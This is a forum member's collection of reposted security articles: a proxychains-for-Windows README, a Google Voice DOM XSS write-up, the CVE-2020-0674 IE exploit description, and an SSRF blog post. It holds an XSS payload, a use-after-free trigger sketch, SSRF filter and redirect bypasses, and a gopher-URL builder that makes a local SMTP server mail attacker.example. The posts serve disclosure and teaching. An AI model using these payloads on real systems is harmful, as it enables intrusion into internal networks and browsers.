Everything posted by Nytro
-
Proxychains.exe - Proxychains for Windows

Proxychains.exe is a proxifier for Win32 (Windows) and Cygwin/Msys2 programs. It hijacks most Win32 or Cygwin programs' TCP connections, forcing them through one or more SOCKS5 proxies. It hooks the network-related Winsock functions in Ws2_32.dll in dynamically linked programs by injecting a DLL, and redirects the connections through the SOCKS5 proxies.

Proxychains.exe is a port (or rewrite) of proxychains4 / proxychains-ng to Win32 and Cygwin. It uses uthash for some data structures and MinHook for API hooking. It has been tested on Windows 10 x64 1909 (18363.418), Windows 7 x64 SP1, Windows XP x86 SP3 and Cygwin 64-bit 3.1.2. The target OS must have the Visual C++ Redistributable for Visual Studio 2015 installed.

WARNING: DNS LEAKS ARE INEVITABLE IN THE CURRENT VERSION. DO NOT USE IT IF YOU WANT ANONYMITY!

WARNING: this program works only on dynamically linked programs. Both proxychains.exe and the program it calls must be of the same platform and architecture (use proxychains_x86.exe to call x86 programs, proxychains_x64.exe to call x64 programs, and the Cygwin builds to call Cygwin programs).

WARNING: this program is based on hacks and is at an early stage of development. Anything unexpected may happen during use: the called program may crash, not work, produce unwanted results, and so on. Be careful when working with this tool.

WARNING: this program can be used to circumvent censorship; doing so can be VERY DANGEROUS in certain countries. ALWAYS MAKE SURE THAT PROXYCHAINS.EXE WORKS AS EXPECTED BEFORE USING IT FOR ANYTHING SERIOUS. This applies to both the program and the proxy you are going to use. For example, you can connect to a "what is my IP" service such as ifconfig.me to make sure it is not seeing your real IP. ONLY USE PROXYCHAINS.EXE IF YOU KNOW WHAT YOU ARE DOING.
THE AUTHORS AND MAINTAINERS OF PROXYCHAINS DO NOT TAKE ANY RESPONSIBILITY FOR ANY ABUSE OR MISUSE OF THIS SOFTWARE AND THE RESULTING CONSEQUENCES.

Build

First, clone this repository and run git submodule update --init --recursive in it to retrieve all submodules.

Win32 build: open proxychains.exe.sln with a recent version of Visual Studio (tested with Visual Studio 2019) using platform toolset v141_xp, on 64-bit Windows. Build the whole solution and the DLL and executable files will be generated under win32_output/.

Cygwin/Msys2 build: install Cygwin/Msys2 and the various build-tool packages (gcc, w32api-headers, w32api-runtime, etc.). Run bash, switch to the cygwin_build / msys_build directory, and run make.

Install

Copy proxychains*.exe and [cyg/msys-]proxychains_hook*.dll to a directory included in your PATH environment variable. You can rename the main executable (e.g. proxychains_win32_x64.exe) to a name you prefer, such as proxychains.exe. Finally, create the needed configuration file in the correct place. See "Configuration".

Configuration

Proxychains.exe looks for its configuration in the following order:
1. The file named by the environment variable %PROXYCHAINS_CONF_FILE% or $PROXYCHAINS_CONF_FILE, or provided with the -f argument
2. $HOME/.proxychains/proxychains.conf (Cygwin) or %USERPROFILE%\.proxychains\proxychains.conf (Win32)
3. (SYSCONFDIR)/proxychains.conf (Cygwin) or (user roaming dir)\Proxychains\proxychains.conf (Win32)
4. /etc/proxychains.conf (Cygwin) or (global programdata dir)\Proxychains\proxychains.conf (Win32)

For the available options, see proxychains.conf.

Usage Example

proxychains ssh some-server
proxychains "Some Path\firefox.exe"
proxychains /bin/curl https://ifconfig.me

Run proxychains -h for more command line argument options.

How It Works

The main program hooks the CreateProcessW Win32 API call, then creates the child process that was requested. After creating the process, the hooked CreateProcessW injects the hook DLL into the child process.
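As a sketch of what a working configuration might contain, assuming the option syntax of proxychains-ng (which this port mimics; the bundled proxychains.conf template is authoritative, and the proxy address below is only an example):

```
# Use the proxies strictly in the listed order
strict_chain
# Suppress per-connection log output
quiet_mode

[ProxyList]
# type  host       port
socks5  127.0.0.1  1080
```

With this in place, proxychains /bin/curl https://ifconfig.me should report the proxy's exit address rather than your own.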
When the child process has been injected, it hooks the following Win32 API calls:
- CreateProcessW, so that every descendant process also gets hooked;
- connect, WSAConnect and ConnectEx, so that TCP connections get hijacked;
- the GetAddrInfoW series, so that a Fake IP is used to track the hostnames you visit, allowing remote DNS resolution; etc.

The main program does not exit; it serves as a named pipe server. The child process communicates with the main program to exchange data including logs, hostnames, etc. The main program does most of the bookkeeping of Fake IPs and of the presence of descendant processes. When all descendant processes have exited, the main program exits. The main program terminates all descendant processes when it receives a SIGINT (Ctrl-C).

About Cygwin/Msys2 and Busybox

Cygwin is fully supported since 0.6.0! By switching the DLL injection technique from CreateRemoteThread() to modifying the target process' entry point, proxychains.exe now proxifies Cygwin/Msys2 processes perfectly (even when you call them with the Win32 version of proxychains.exe). See DevNotes. If you want to proxify the MinGit busybox variant, replace its busybox.exe with this modified version. See DevNotes.

To-do and Known Issues

- Add an option to completely prevent "DNS leaks"? (Do name lookups on the SOCKS5 server only)
- Properly handle "fork-and-exit" child processes? (In this case the descendant processes' DNS queries would never succeed)
- Remote DNS resolution based on UDP ASSOCIATE
- Hook sendto(), to cope with applications that do TCP Fast Open
- Connection closure should be correctly handled in Ws2_32_LoopRecv and Ws2_32_LoopSend (fixed in 0.6.5)
- A large part of the SOCKS5 server name could be lost when parsing the configuration (fixed in 0.6.5)
- Correctly handle conf and hosts files that start with a BOM (fixed in 0.6.5)
- Detect .NET CLR programs that are AnyCPU and prefer 32-bit, or target x86, or target x64.
(These are "shimatta" programs, which must be injected via CreateRemoteThread()) (fixed in 0.6.2)
- ResumeThread() in case of an error during injection (fixed in 0.6.1)
- Fix choco err_unmatched_machine (fixed in 0.6.1)
- Get rid of the Offending/Matching host key confirmation when proxifying git/SSH, probably using an FQDN hash function (fixed in 0.6.0)
- Tell the user if the command line is bad under Cygwin (fixed in 0.6.4)
- Inherit the exit code of the direct child (fixed in 0.6.4)

Licensing

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License version 2 for more details. You should have received a copy of the GNU General Public License version 2 along with this program (COPYING). If not, see http://www.gnu.org/licenses/.

Uthash

https://github.com/troydhanson/uthash

This program contains uthash as a git submodule, which is published under the 1-clause BSD license:

Copyright (c) 2008-2018, Troy D. Hanson http://troydhanson.github.com/uthash/ All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

MinHook

https://github.com/TsudaKageyu/minhook

This program contains MinHook as a git submodule, which is published under the 2-clause BSD license:

MinHook - The Minimalistic API Hooking Library for x64/x86
Copyright (C) 2009-2017 Tsuda Kageyu. All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Sursa: https://github.com/shunf4/proxychains-windows
-
DOM-Based XSS at accounts.google.com by Google Voice Extension

This universal DOM-based XSS was discovered accidentally; it is fortunate that Google Ads customer IDs have the same format as American phone numbers. I opened Gmail to check my inbox and the following popped up. I rushed to report it to avoid a dupe, without even checking what was going on, as a stored XSS in Gmail triggered by Google Ads rules, as the picture shows, but the reality was something else. Why did it work? Because of two things: the Google Voice extension was installed, and the text '444-555-4455 <img src=x onerror=alert(1)>' was on the inbox page. After a couple of minutes, I realized that this XSS was triggered by the Google Voice extension, which can execute JavaScript anywhere, and thus on accounts.google.com and facebook.com. I extracted the Google Voice extension's source code to find out what was in question. In the file contentscript.js there was a function called Wg() which was responsible for the DOM XSS.

function Wg(a) {
    for (var b = /(^|\s)((\+1\d{10})|((\+1[ \.])?\(?\d{3}\)?[ \-\.\/]{1,3}\d{3}[ \-\.]{1,2}\d{4}))(\s|$)/m,
             c = document.evaluate('.//text()[normalize-space(.) != ""]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null),
             d = 0; d < c.snapshotLength; d++) {
        a = c.snapshotItem(d);
        var f = b.exec(a.textContent);
        if (f && f.length) {
            f = f[2];
            var g = "gc-number-" + Ug,
                h = '<span id="' + g + '" class="gc-cs-link" title="Call with Google Voice">' + f + "</span>",
                k;
            if (k = a.parentNode && !(a.parentNode.nodeName in Og)) {
                k = a.parentNode.className;
                k = "string" === typeof k && k.match(/\S+/g) || [];
                k = !Fa(k, "gc-cs-link");
            }
            if (k) try {
                if (!document.evaluate('ancestor-or-self::*[@googlevoice = "nolinks"]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null).snapshotLength) {
                    if (0 == a.parentNode.childElementCount) {
                        var w = a.parentNode.innerHTML,
                            y = w.replace(f, h);
                        a.parentNode.innerHTML = y;
                    } else {
                        w = a.data;
                        y = w.replace(f, h);
                        var u = Qc("SPAN");
                        u.innerHTML = y;
                        h = u;
                        k = a;
                        v(null != h && null != k, "goog.dom.insertSiblingAfter expects non-null arguments");
                        k.parentNode && k.parentNode.insertBefore(h, k.nextSibling);
                        Vc(a);
                    }
                    var t = Ic(document, g);
                    t && (Ug++, nc(t, "click", ma(Sg, t, f)));
                }
            } catch (E) {}
        }
    }
}

The function isn't difficult to read: the developer looks for a phone number in the content of the body's elements, grabs it, and creates another span element with the grabbed phone number as its content, so that the user can click and call that number right from the web page.
Let's break it down. From line 1 to line 9, the function loops through the contents of the body's elements with document.evaluate. document.evaluate is a method that makes it possible to search within an HTML or XML document; it returns an XPathResult object representing the result. Here it is used to grab all of the body's elements' contents — technically, to select all the text nodes under the current node — assigning each one in turn to the variable 'a'. This was the source; note that it is a DOM XPath injection:

(var b = /(^|\s)((\+1\d{10})|((\+1[ \.])?\(?\d{3}\)?[ \-\.\/]{1,3}\d{3}[ \-\.]{1,2}\d{4}))(\s|$)/m, c = document.evaluate('.//text()[normalize-space(.) != ""]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null), d = 0; d < c.snapshotLength; d++) { a = c.snapshotItem(d);

The code then runs the regex in variable 'b' (which matches the American phone number format) against the text stored in variable 'a'. If a match is found, it is assigned to variable 'f' and placed as the content of a span element in variable 'h'. Lines 10 and 11 check that the tag of the HTML element from which variable 'f' got its content is none of SCRIPT, STYLE, HEAD, OBJECT, TEXTAREA, INPUT, SELECT and A, and that it does not have a class attribute with the value "gc-cs-link". This check is mainly for two things: 1) it prevents the extension from messing with the DOM where it shouldn't, because it doesn't want to touch the content of elements such as SCRIPT, STYLE and HEAD, and wouldn't achieve what it wants on elements like INPUT, SELECT, etc.; 2) it stops the script from looping infinitely, because it must not create the span element with the phone number again if it already exists.
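As a standalone illustration of why this pattern is dangerous, here is a hedged sketch (not the extension's code: the variable names mirror Wg(), but the DOM is replaced by a plain string standing in for parentNode.innerHTML):

```javascript
// The page content contains both a phone number and attacker-controlled
// markup that, so far, is only inert text (e.g. rendered from an email).
const b = /(^|\s)((\+1\d{10})|((\+1[ \.])?\(?\d{3}\)?[ \-\.\/]{1,3}\d{3}[ \-\.]{1,2}\d{4}))(\s|$)/m;

const text = '444-555-4455 <img src=x onerror=alert(1)>';
const f = b.exec(text)[2]; // the matched phone number only
const h = '<span id="gc-number-0" class="gc-cs-link">' + f + "</span>";

// Wg() effectively does innerHTML = innerHTML.replace(f, h): the phone
// number is wrapped, but the attacker's markup rides along unescaped and
// is re-parsed as live HTML when the result is assigned back.
const y = text.replace(f, h);
console.log(y);
```

Running this shows the rewritten markup still carrying the attacker's <img onerror=...> payload, which the real code then hands to innerHTML.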
From line 12 to line 27 there is an if condition: if variable 'k' is true, meaning no element with a class attribute of "gc-cs-link" has been found, it executes a try statement. Inside the try statement, another if condition checks (again using document.evaluate) that no ancestor element with a "googlevoice" attribute set to "nolinks" can be found. A nested if condition then checks whether the parent of variable 'a' has no child elements, and here is where the sink happens:

w = a.parentNode.innerHTML, y = w.replace(f, h); a.parentNode.innerHTML = y

This is the case where the parent has no child elements; otherwise it executes the next statement, where it sinks again on the following line:

k.parentNode && k.parentNode.insertBefore(h, k.nextSibling);

The fix: I believe the developer meant to pass only variable 'f', which holds the phone number value (for example '+12223334455'), to the sinks (innerHTML, insertBefore); instead, for a reason I couldn't understand, the content of variable 'a', which holds the payload (e.g. '444-555-4455 <img src=x onerror=alert(1)>'), reaches the sinks. This XSS could have been avoided otherwise.

Reward: $3,133.7

Sursa: http://www.missoumsai.com/google-accounts-xss.html
-
ELF file viewer/editor for Windows, Linux and MacOS.

How to build on Linux
- Install Qt 5.12.8: https://github.com/horsicq/build_tools
- Clone the project: git clone --recursive https://github.com/horsicq/XELFViewer.git
- Edit build_lin64.bat (check the QT_PATH variable)
- Run build_lin64.bat

How to build on OSX
- Install Qt 5.12.8: https://github.com/horsicq/build_tools
- Clone the project: git clone --recursive https://github.com/horsicq/XELFViewer.git
- Edit build_mac.bat (check the QT_PATH variable)
- Run build_mac.bat

How to build on Windows (XP)
- Install Visual Studio 2013: https://github.com/horsicq/build_tools
- Install Qt 5.6.3 for VS2013: https://github.com/horsicq/build_tools
- Install 7-Zip: https://github.com/horsicq/build_tools
- Clone the project: git clone --recursive https://github.com/horsicq/XELFViewer.git
- Edit build_winxp.bat (check the VS_PATH, SEVENZIP_PATH and QT_PATH variables)
- Run build_winxp.bat

How to build on Windows (7-10)
- Install Visual Studio 2017: https://github.com/horsicq/build_tools
- Install Qt 5.12.8 for VS2017: https://github.com/horsicq/build_tools
- Install 7-Zip: https://github.com/horsicq/build_tools
- Clone the project: git clone --recursive https://github.com/horsicq/XELFViewer.git
- Edit build_win32.bat (check the VS_PATH, SEVENZIP_PATH and QT_PATH variables)
- Run build_win32.bat

Sursa: https://github.com/horsicq/XELFViewer
-
CVE-2020-0674

CVE-2020-0674 is a use-after-free vulnerability in the legacy jscript engine, triggerable through Internet Explorer. The exploit here was written by maxpl0it, but the vulnerability itself was discovered by Qihoo 360 while it was being exploited in the wild. This exploit simply pops calc. An exploit writeup is coming soon.

Vulnerability Overview

The vulnerability exists in the Array sort function when a comparator function is used. The two arguments supplied to the comparator are not tracked by the garbage collector, and will therefore point to freed memory after the GC runs.

Exploit Notes

The exploit was written specifically for Windows 7, but could probably be ported without too much hassle. It was written for x64 instances of IE, and will therefore run on (and has been tested on) the following browser configurations:
- IE 8 (x64 build)
- IE 9 (x64 build)
- IE 10 (either with Enhanced Protected Mode enabled or with TabProcGrowth enabled)
- IE 11 (either with Enhanced Protected Mode enabled or with TabProcGrowth enabled)

It's worth noting that Enhanced Protected Mode on Windows 7 simply enables the x64 version of the browser process, so it's not a sandbox escape so much as there not being any additional sandbox. Ironically, since this exploit is for x64, EPM actually allows it to work.

The exploit isn't made to entirely bypass EMET (only a stack-pivot detection bypass has really been implemented); however, the final version (5.52) doesn't seem to trigger EAF+ when the exploit is run, whereas 5.5 does (at least on Windows 7 x64). So IE 11 in Enhanced Protected Mode with maximum EMET settings enabled still allows the exploit.

The exploit is heavily commented, but to get a better understanding of how it works and what it's doing at each stage, change var debug = false; to var debug = true; and either open the developer console to view the log, or keep it closed and view the alert popups instead (which might be a little annoying).
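The shape of the trigger can be sketched as follows. This is a hypothetical minimal illustration of the pattern described above, not the actual exploit; CollectGarbage() exists only in IE's jscript engine, so it is guarded here and the snippet is a harmless sort everywhere else:

```javascript
// Sketch of the CVE-2020-0674 pattern: in the legacy jscript engine the
// comparator's two arguments are not tracked as GC roots, so forcing a
// collection inside the comparator leaves `a` and `b` dangling.
var arr = [{ id: 3 }, { id: 1 }, { id: 2 }];
arr.sort(function (a, b) {
  // jscript-only; a no-op under modern engines such as V8/Node.
  if (typeof CollectGarbage === "function") CollectGarbage();
  // In vulnerable jscript, touching `a`/`b` past this point reads freed
  // memory; in a patched engine this is just an ordinary numeric sort.
  return a.id - b.id;
});
```

From here, the exploit's job is to reclaim the freed allocation with attacker-controlled data before the comparator dereferences its stale arguments.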
Sursa: https://github.com/maxpl0it/CVE-2020-0674-Exploit
-
Android Reversing for Examiners

Preamble

This lab was created by Mike Williamson (Magnet Forensics) and Chris Atha (NW3C). It was originally designed to be delivered live as a lab. With COVID-19, the lab was reworked to be delivered virtually, beginning with the Magnet Virtual Summit in May 2020. This gitbook is available to all, and we really hope you enjoy it and take something away from it.

Many of the topics and processes introduced in this lab are complex. Our objective for the live delivery component was to pack as much content as possible into a 90-minute lab. To cover the inevitable explanatory shortfall, this gitbook provides a lot of accompanying documentation and guidance which you can go through at your convenience, should you wish to delve deeper!

Video Walkthroughs

Some people learn better by seeing, so a number of walkthrough videos have been created to assist with processes not specifically covered in the lab. The videos are referenced in the appropriate places in this documentation, but there is also a full playlist located here.

Support Frida

We wanted to include a section about how to support Frida if you find it useful! Ole André, the creator of Frida, pointed to this tweet and advises that the best thing you can do is check out the products offered by NowSecure! A pretty small ask for how powerful this thing is, and for how much work goes into keeping the project going!

Legal

The opinions and information expressed in this gitbook are those of the authors. They do not purport to reflect the opinions or views of Magnet Forensics or NW3C. NW3C is a trademark of NW3C, Inc. d/b/a the National White Collar Crime Center. The trademarks, logos, or screenshots referenced are the intellectual property of their respective owners.

Sursa: https://summit-labs.frida.ninja/
-
Piercing the Veal: Short Stories to Read with Friends

d0nut · Apr 27 · 16 min read

Title respectfully inspired by Alyssa Herrera's Piercing the Veil SSRF blog post.

It's been over a year and a half since I started my bug bounty journey as a hacker. With years of experience triaging reports and working in security, I've seen a plethora of bug types, attack vectors, and exploitation techniques. I've had such a healthy diversity of exposure to these different concepts that it's quite honestly surprising that one particular bug class has captured my imagination as effortlessly and decisively as Server-Side Request Forgery has. Today, I want to share my love for SSRF by discussing what it is, why companies care about it, how I approach testing features I suspect may be vulnerable to SSRF, and lastly by sharing a couple of short stories about SSRFs that I've found in my time hacking.

Modern Web Applications

The modern web application consists of a fair bit more than just a couple of PHP files and FastCGI. These increasingly complex stacks often consist of dozens upon dozens of services running in a production network, mostly isolated from the public internet. Each of these services, generally responsible for one or a few related tasks or models powering the web application, can be spun up and down to help deal with sudden changes in load. It's an amazing feat that allows the modern web application to scale to millions and hundreds of millions of users.

An example modern web application architecture

In this model, attackers and users both start with the same level of privilege (an unprivileged network position, the left side of the image above), which directly determines the exposed attack surface. The only service these actors can directly interact with (or attack) is the nginx instance, which has both public and private IP addresses.
It’s also worth pointing out that because the exposed nginx instance uses vHosts, external parties are also able to interact with the www, app, and link services, though not the machines directly. Regardless, attackers are unable to meaningfully control interactions with the IAM, Redis, Widget Service, and two MySQL instances. But imagine that this wasn’t true. Imagine, as an attacker, that you were able to talk to any of these services and systems directly. Perhaps, and is often the case, these internal services aren’t secured as well; priority to the security of these systems is yielded to that of the perimeter. It would be a field-day for any attacker. At this point, our story could diverge: we could talk about how differences in the interpretation of the HTTP standard between the vhost services and nginx could enable Request Smuggling vulnerabilities. We could also talk about how second-order SQLi can occur from data stored in one service and processed by another. We could even discuss the attacks against internal HTTP requests by injecting query parameter-breaking characters such as # or & to introduce new parameters or to truncate them instead. However, I’d like to discuss how SSRF fits into this picture. What is SSRF? SSRF, or Server-Side Request Forgery, is a vulnerability where an attacker is able to direct a system in a privileged network position to issue a request to another system with a privileged network position. Keep in mind the bold sections: there is definitely a need to support features where an attacker can direct a service in a privileged network position to make a request to a system in an unprivileged network position. A perfect example of this is a webhook feature as found on Github or Dropbox. Being able to point a webhook at your burp collaborator instance is not a vulnerability. Impactful SSRF on left; not right Of course, there are exceptions to every rule. 
I use this stricter definition to help direct the most common instances of SSRF and faux-SSRF to their respective determinations: valid or invalid. Case in point: I did once encounter a situation where being able to change the address to an attacker-controlled machine without a privileged network position allowed me to read the Authorization header and steal credentials used on an internal API call... so take this with a grain of salt.

The typical feature or place to find SSRF is where some parameter contains a URL or domain as its value. Seeing a POST request like the following:

POST /fetchPage HTTP/1.1
Host: app.example.com
...
Content-Type: application/x-www-form-urlencoded

url=http%3A%2F%2Ffoobar.com%2fendpoint

is a pretty clear sign that this is the kind of feature that may introduce an SSRF vulnerability. There are some other types of features, like HTML-to-PDF generators, where a headless browser or similar is used in a privileged network position to generate a preview or PDF. If you're curious about these kinds of attack vectors, go read the slides that Daeken and Nahamsec put together for DEFCON. In fact, anywhere you may be able to control an address to another system is a place where you should try testing for SSRF. Technically, even a Host header could be a vulnerable parameter.

If It Walks Like a Duck and It Talks Like a Duck...

I didn't originally intend for this blog post to be a "how to test for SSRF" guide (there are plenty of those), but when I was drawing up the outline for the material I felt that I should at least cover some of the behaviors and characteristics that I look for when testing for SSRF. I'm generally interested in the following questions:

Can I read the response?

Am I able to read the response? If not, is there any additional information given to me based on the availability of the receiving system? If the port isn't open, does an error get returned? If the system doesn't speak HTTP but is receiving traffic, what happens?
If I can read the response, then proving impact is a breeze: we just need to identify an internal service that responds to whatever protocols we have access to and read a response from it. If we can't read the response, we might have to come up with interesting side channels, like differing error messages, or see if we can blindly coerce an internal service to issue a request to the internet.

Where are we?

Is the vulnerable service running on some Infrastructure-as-a-Service (IaaS) platform (like AWS or GCP), or are we on something less sophisticated or more custom? This lets me know whether I'm able to reach a metadata service, and may clue me in to what kinds of systems may be running in the internal network.

Can I redirect?

This is pretty straightforward. What are the rules for redirecting? Are they always rejected? Are they always processed? Or is there some nuance in between? Redirects are a super common method of bypassing mitigations for SSRF. Occasionally web applications will check whether the initial domain resolves to an RFC1918 address and error out if so. These kinds of checks are usually only performed on the initial request, and a 302 redirect can be leveraged to tell the client to pivot to the internal network. Beware of proxies in front of these internal HTTP clients, though, as they can properly discern whether a request should be forwarded to its destination.

What protocols does the client support?

HTTP/HTTPS only? FTP? Gopher?? Supporting additional protocols (especially Gopher) will increase the level of impact and the exploitation options available to you. Remember to think creatively about how you can demonstrate that you're able to successfully interact with internal systems.
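The initial-request-only RFC1918 check can be modeled with a toy sketch (hypothetical helper names, not any real framework's API): the private-range test runs once against the initial target, so a public host that answers with 302 Location: http://169.254.169.254/ is never re-validated.

```javascript
// Toy sketch of an SSRF guard that only validates the *initial* target.
function isPrivate(ip) {
  // RFC1918 ranges plus loopback and link-local (simplified).
  return /^(10\.|127\.|169\.254\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)/.test(ip);
}

function checkOnce(initialIp) {
  // The check happens once, before the first request is issued...
  if (isPrivate(initialIp)) throw new Error("blocked");
  // ...but if the (public) initial host replies with a 302 pointing at an
  // internal address, the redirect target never passes through isPrivate().
  return "request allowed";
}
```

A safer design re-runs the check on every hop of the redirect chain, against the resolved address rather than the hostname.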
This is much easier when you can read the response, of course; but if you're able to obtain that kind of information via a side channel, like an error when ports are filtered or blocked, or if you're able to get the service to interact with the outside world as a result of your privileged message, then you're going to be more successful in proving the presence of SSRF. For inspiration: one of my favorite methods of demonstrating that I have an SSRF is leveraging a localhost SMTP service to show that I'm able to trigger the system to send me an email. This is a method that I've used twice now in HackerOne SSRF reports. Lastly, moving away from the HTTP and HTTPS protocols can let you bypass the proxies mentioned earlier. Oftentimes these proxies only handle HTTP or HTTPS traffic, so being able to speak a protocol like Gopher can allow you to bypass the internal proxy altogether.

SSRF and Where to Find Them

As stated before, SSRF can show up anywhere a system-addressable string shows up (IP, domain name, email address, etc.). While I could start enumerating every possible feature that could become an SSRF (and still miss a ton of possible examples), I think a better way to learn is to read stories about ones others have found and try to extrapolate other similar attack vectors.

Story 1 — Duck Duck Gopher

(This report is public, so go read about it here.)

This story starts in the middle of October 2018, the early part of my bug hunting career. On the advice of a friend, I was hacking on a new private program invite I had received for Nintendo (it's public now). I spent a number of hours trying to find anything remotely interesting but struggled to make progress, and ended up giving up after an unsuccessful couple of hours. I was going to take one last brief look at my HTTP history in Burp Suite before closing it down and going to bed. That's when I noticed a single request fly by that just seemed too good to be true.
At this time I had DuckDuckGo configured as my default search engine in Chrome (though, admittedly, I pretty much always opened Google instead; so much for privacy ¯\_(ツ)_/¯). At one point I had accidentally submitted a search query to DuckDuckGo, and Burp had intercepted all of the requests that page made. The one that caught my eye was a request to https://duckduckgo.com/iu. This request had a query parameter named url that appeared to return a page response whenever the parameter contained a URL with a domain name of yimg.com.

Successful request

However, when you tried another domain, like google.com, you'd encounter an error indicating that they were doing some sort of filtering to reject requests to other domains. Notice the 403 Forbidden in this response, as opposed to the 200 OK above.

Unsuccessful request

On a hunch, I decided to see whether this service was actually parsing the URL for the whitelist check or just using a string.contains-fueled check. Sure enough, that was all I needed to bypass the filter and begin investigating this for possible SSRF behavior.

Bypassing a string.contains filter by appending the domain to a fake query parameter

As mentioned above, some of the things I want to investigate are the client's ability to redirect and, if possible, what other protocols it supports. Upon testing for redirect behavior, I noticed that redirects were respected. I pointed DuckDuckGo at an endpoint that would respond with a 302 redirect to a Burp Collaborator instance and confirmed that the redirect worked. Afterwards, I checked whether the gopher protocol was supported by using it in the Location header of the redirect. The gopher protocol would allow me to talk to many more services internally, so it was useful to learn whether this client supported it (and it would increase the severity of the finding). I was able to perform a port scan using this SSRF and discovered a number of services running on localhost.
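The substring-style allowlist check can be modeled like this (a guessed reconstruction for illustration; the actual DuckDuckGo implementation was never published):

```javascript
// If the filter only asks "does the URL contain an allowed domain?",
// the allowed domain can simply be smuggled into a query parameter.
function naiveAllow(url) {
  return url.includes("yimg.com"); // string.contains-style check
}

function parsedAllow(url) {
  return new URL(url).hostname.endsWith("yimg.com"); // parse, then check
}

const bypass = "https://internal.example/?fake=yimg.com";
console.log(naiveAllow(bypass));  // the naive filter lets this through
console.log(parsedAllow(bypass)); // rejected once the URL is parsed
```

Even the parsed check would need a dot-boundary test in practice (it would still accept a hostname like evilyimg.com), but it already defeats the fake-query-parameter trick used in this story.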
One of these services, on port 6868, was Redis, which actually returned some data when hit with HTTP. The JSON that was returned mentioned a domain that only seemed resolvable internally. Now, with this SSRF, I would be able to port scan that service and begin identifying services I could communicate with. Here's a diagram to help demonstrate where we're at with this attack.

SSRF against duckduckgo

Eventually, I noticed that port 8091 was open on cache-services.duckduckgo.com and was returning a ton of data. I had begun my report to DuckDuckGo a bit earlier than this, but wanted to see what else I could do to increase the impact (and to learn). Around this point, I stopped hacking on the target and called it a day.

Aftermath

Unfortunately, DuckDuckGo doesn't pay for bugs, but they do offer some swag. I ended up getting a DuckDuckGo t-shirt, a really great story, and a public disclosure that I'm quite proud of.

Story 2 — In ursmtp

I was invited to a private program that I didn't have a lot of hope for. It was one of those services that felt like it could be replaced by any other CRUD app on the market. It didn't really offer much in the way of interesting behavior as far as I could tell, and I was getting quite bored of it. While the scope did allow a *. domain, I wasn't finding much of interest on it. Eventually, I found a feature that allowed a user to update the information on their account. One of the fields you could fill out was your personal website address (similar to the one on Twitter). An interesting behavior was that if the website didn't exist or was inaccessible for some reason, the field would turn yellow; if the site did exist, the field would turn green.

Site doesn't exist vs. site does exist

This feedback mechanism made me realize that this was more than a simple CRUD app: the service must be issuing an HTTP request to the specified address. I put a Burp Collaborator address in to confirm, and sure enough I saw a request come in.
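The localhost-SMTP proof of impact mentioned earlier (triggering the server to email you) can be sketched as a gopher payload. This is a hedged illustration with made-up addresses: a permissive gopher client sends the URL path bytes verbatim over TCP, so a raw SMTP transaction can be packed into the URL and fired at port 25.

```javascript
// Pack a raw SMTP session into a gopher:// URL. The "_" after the slash
// is the gopher type selector; everything after it is sent as-is.
const lines = [
  "HELO attacker.example",
  "MAIL FROM:<ssrf@victim.example>",
  "RCPT TO:<me@attacker.example>",
  "DATA",
  "Subject: SSRF proof",
  "",
  "hello from the inside",
  ".",
  "QUIT",
];
const payload = lines.join("\r\n") + "\r\n";
const url = "gopher://localhost:25/_" + encodeURIComponent(payload);
console.log(url);
```

If the vulnerable client follows this URL, the local mail daemon sees a complete SMTP conversation and the proof arrives in your inbox.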
